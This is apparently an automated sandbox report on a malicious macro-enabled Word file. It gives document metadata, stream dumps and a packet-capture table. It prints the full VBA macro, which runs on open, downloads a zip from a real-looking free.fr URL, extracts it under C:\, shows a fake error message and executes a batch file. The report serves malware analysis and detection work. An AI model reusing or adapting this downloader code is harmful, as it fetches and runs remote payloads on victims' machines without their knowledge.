                            TLSH:B223C701B2D6DE27F66652321DD7C6EAB239BC0A6F51C31B32407F2EBC75A308A11759
                            Icon Hash:35e1cc889a8a8599
                            Document Type:OLE
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:Microsoft Office Word
                            Encrypted Document:False
                            Contains Word Document Stream:True
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Code Page:1252
                            Title:
                            Subject:
                            Author:USER
                            Keywords:
                            Comments:
                            Template:Normal.dotm
                            Last Saved By:USER
                             Revision Number:9
                            Total Edit Time:1320
                            Create Time:2025-01-02 11:13:00
                            Last Saved Time:2025-03-03 20:04:00
                            Number of Pages:1
                            Number of Words:20
                            Number of Characters:118
                            Creating Application:Microsoft Office Word
                            Security:0
                            Document Code Page:1252
                            Number of Lines:1
                            Number of Paragraphs:1
                            Thumbnail Scaling Desired:False
                            Company:
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:1048576
                            General
                            Stream Path:Macros/VBA/ThisDocument
                            VBA File Name:ThisDocument.cls
                            Stream Size:7677
                            Attribute VB_Name = "ThisDocument"
                            Attribute VB_Base = "1Normal.ThisDocument"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = True
                            Attribute VB_Customizable = True
                            Sub downloadFile(url As String, fileOutPath As String)
                                Dim WinHttpReq As Object, oStream As Object
                                Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
                                WinHttpReq.Open "GET", url, False
                                WinHttpReq.Send
                                If WinHttpReq.Status = 200 Then
                                    Set oStream = CreateObject("ADODB.Stream")
                                    oStream.Open
                                    oStream.Type = 1
                                    oStream.Write WinHttpReq.ResponseBody
                                    oStream.SaveToFile fileOutPath, 2
                                    oStream.Close
                                End If
                            End Sub
                            Sub Unzip(dirr As String)
                                Dim sh As Shell32.Shell
                                Dim sf As Shell32.Folder
                                Dim df As Shell32.Folder
                                Set sh = New Shell32.Shell
                                Set df = sh.NameSpace(dirr)
                                Set sf = sh.NameSpace(dirr & "1741130958.zip")
                                df.CopyHere sf.Items
                            End Sub
                            Function GenerateRandomValue() As String
                                Dim randomNum As String
                                Randomize
                                randomNum = Trim(Str(Int((10000000 - 11 + 1) * Rnd + lowerbound)))
                                GenerateRandomValue = randomNum
                            End Function
                            Sub DownloadUnzipAndRun()
                                Dim url As String
                                Dim savePath As String
                                Dim ShellApp As Object
                                Dim rundomnum As String
                                Dim dirr As String
                                url = "http://portalsphere.free.fr/phUploader/uploads/1741130958.zip"
                                rundomnum = GenerateRandomValue
                                dirr = "C:\" & rundomnum & "\"
                                MkDir dirr
                                savePath = dirr & "1741130958.zip"
                                downloadFile url, savePath
                                Unzip dirr
                                Dim objShell As Object
                                Set objShell = CreateObject("WScript.Shell")
                                    MsgBox "File Error loading,please sender.."
                                objShell.Run dirr & "\Ppo.bat"
                                Set WinHttpReq = Nothing
                                Set oStream = Nothing
                                Set ShellApp = Nothing
                                Set objShell = Nothing
                            End Sub
                            Sub Document_Open()
                            DownloadUnzipAndRun
                            End Sub
                            Sub AutoOpen()
                            DownloadUnzipAndRun
                            End Sub
                            
                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.235956365095031
                            Base64 Encoded:True
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:0.24428749081187057
                            Base64 Encoded:False
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:0.4613560948312974
                            Base64 Encoded:False
                            General
                            Stream Path:1Table
                            CLSID:
                            File Type:data
                            Stream Size:7725
                            Entropy:5.795578933395778
                            Base64 Encoded:True
                            General
                            Stream Path:Data
                            CLSID:
                            File Type:dBase III DBT, version number 0, next free block index 1189, 1st item "?\350\275\346`\332\276\327\232\355\245\226\2257\260\037Y_I\260n\212]v\001\370\001\251H\262%\224Xe)\0064\332\023\376k\222yq\035\251"
                            Stream Size:4096
                            Entropy:4.390246451733229
                            Base64 Encoded:False
                            General
                            Stream Path:Macros/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:374
                            Entropy:5.344453383898647
                            Base64 Encoded:True
                            General
                            Stream Path:Macros/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:41
                            Entropy:3.0773844850752607
                            Base64 Encoded:False
                            General
                            Stream Path:Macros/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:3441
                            Entropy:4.543463912136946
                            Base64 Encoded:False
                            General
                            Stream Path:Macros/VBA/__SRP_0
                            CLSID:
                            File Type:data
                            Stream Size:2557
                            Entropy:4.368205148043407
                            Base64 Encoded:False
                            Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F E . - \\ . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . . . ) . . . . . . . . . Y . . . . . . . . . . . . . . . . . . .
                            Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00
                            General
                            Stream Path:Macros/VBA/__SRP_1
                            CLSID:
                            File Type:data
                            Stream Size:144
                            Entropy:2.9334168400073426
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u r l . . . . . . . . f i l e O u t P a t h . . . . . . . . d i r r g . . . . . . .
                            Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 f9 02 00 00 00 00 00 00 11 07 00 00 00 00 00 00 08 00 00 00 00 00 01 00 01 00 00 08 03 00 00 00 75 72 6c 03 00 00 08 0b 00 00 00 66 69 6c 65 4f 75 74 50 61 74 68 02 00 00 08
                            General
                            Stream Path:Macros/VBA/__SRP_2
                            CLSID:
                            File Type:data
                            Stream Size:1728
                            Entropy:4.051787019415101
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . Q . . . . . . . q . . . . . . . A . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . y . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 06 00 06 00 1f 00 00 00 e9 06 00 00 00 00 00 00 49 08 00 00 00 00 00 00 51 09 00 00 00 00 00 00 71 09 00 00 00 00 00 00 41 0c 00 00 00 00 00 00 89 09 00 00 00 00 00 00 21 0a 00 00 00 00 00 00 d9 09 00 00 00 00 00 00 b1 0c 00 00 00 00
                            General
                            Stream Path:Macros/VBA/__SRP_3
                            CLSID:
                            File Type:data
                            Stream Size:320
                            Entropy:2.6524913771886793
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . , . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 0 ( . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . 0 ( . . . . . . . . . . . ` . . . . . . . . . . . . . 0 $ . . . . . . . . . . . ` . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . $ . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . n . . . . . . .
                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 2c 00 01 01 00 00 00 00 02 00 00 00 04 60 08 00 05 07 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 91 00 00 00 00 00 01 00 00 00 00 00 1e 30 30 28 00 41 01 00 00 00 00 02 00 01 00 04 60 04 00 09 07 ff ff ff
                            General
                            Stream Path:Macros/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:634
                            Entropy:6.326908155637434
                            Base64 Encoded:True
                            Data ASCII:. v . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . e . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . f . a . . . ! O f f i c . g O . f . i . c
                            Data Raw:01 76 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 65 ca 89 69 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                            General
                            Stream Path:WordDocument
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:2.093976725435268
                            Base64 Encoded:False
                            Data ASCII:. { . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . f f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . .
                            Data Raw:ec a5 c1 00 7b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8a 08 00 00 0e 00 62 6a 62 6a 9c b4 9c b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 fe de d5 66 fe de d5 66 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 4, 2025 09:50:19.336694002 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.341815948 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.341892958 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.342020035 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.347218037 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961134911 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961174965 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961230040 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961265087 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961267948 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.961302042 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961308002 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.961335897 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961354017 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.961369991 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961388111 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.961406946 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961426973 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.961442947 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961457014 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.961483002 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.961497068 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.961646080 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.966681957 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.966717005 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.966753006 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.966756105 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.966767073 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.966790915 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:19.966805935 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:19.966840982 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.051913023 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.051966906 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.051999092 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052002907 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052037001 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052043915 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052043915 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052076101 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052117109 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052134037 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052351952 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052402973 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052409887 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052439928 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052459002 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052474976 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052500963 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052510023 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052529097 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.052546024 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.052597046 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.053322077 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.053356886 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.053381920 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.053392887 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.053409100 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.053426981 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.053446054 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.053462982 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.053498983 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.053508043 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.054128885 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.054162025 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.054184914 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.054198027 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.054215908 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.054233074 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.054255009 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.054269075 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.054286003 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.054305077 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.054316044 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.054349899 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.054984093 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.055038929 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.055058002 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.055116892 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.057082891 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.057142973 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.142909050 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.142950058 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.142987967 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143009901 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143042088 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143043041 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143089056 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143095970 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143131018 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143145084 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143167019 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143183947 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143199921 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143235922 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143249989 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143270016 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143305063 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143322945 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143357038 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143363953 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143416882 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143707037 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143740892 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143768072 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143774986 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143807888 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143810987 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143834114 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143846035 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143856049 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143881083 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143891096 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143918037 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143937111 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143950939 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143959999 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.143985987 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.143999100 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144119978 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144153118 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144172907 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144188881 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144202948 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144224882 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144247055 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144274950 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144366980 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144401073 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144432068 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144438982 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144459963 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144509077 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144512892 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144561052 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144562006 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144594908 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144619942 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144630909 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144653082 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144665956 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144680977 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144701004 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144711971 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144735098 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144752026 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144769907 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144792080 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144809008 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.144819975 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.144968987 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145293951 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.145328045 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.145347118 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145378113 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145385027 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.145420074 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.145437002 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145457029 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.145467043 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145492077 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.145505905 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145531893 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Mar 4, 2025 09:50:20.145565033 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145641088 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.145736933 CET | 49719 | 80 | 192.168.2.6 | 212.27.63.154
                            Mar 4, 2025 09:50:20.150909901 CET | 80 | 49719 | 212.27.63.154 | 192.168.2.6
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
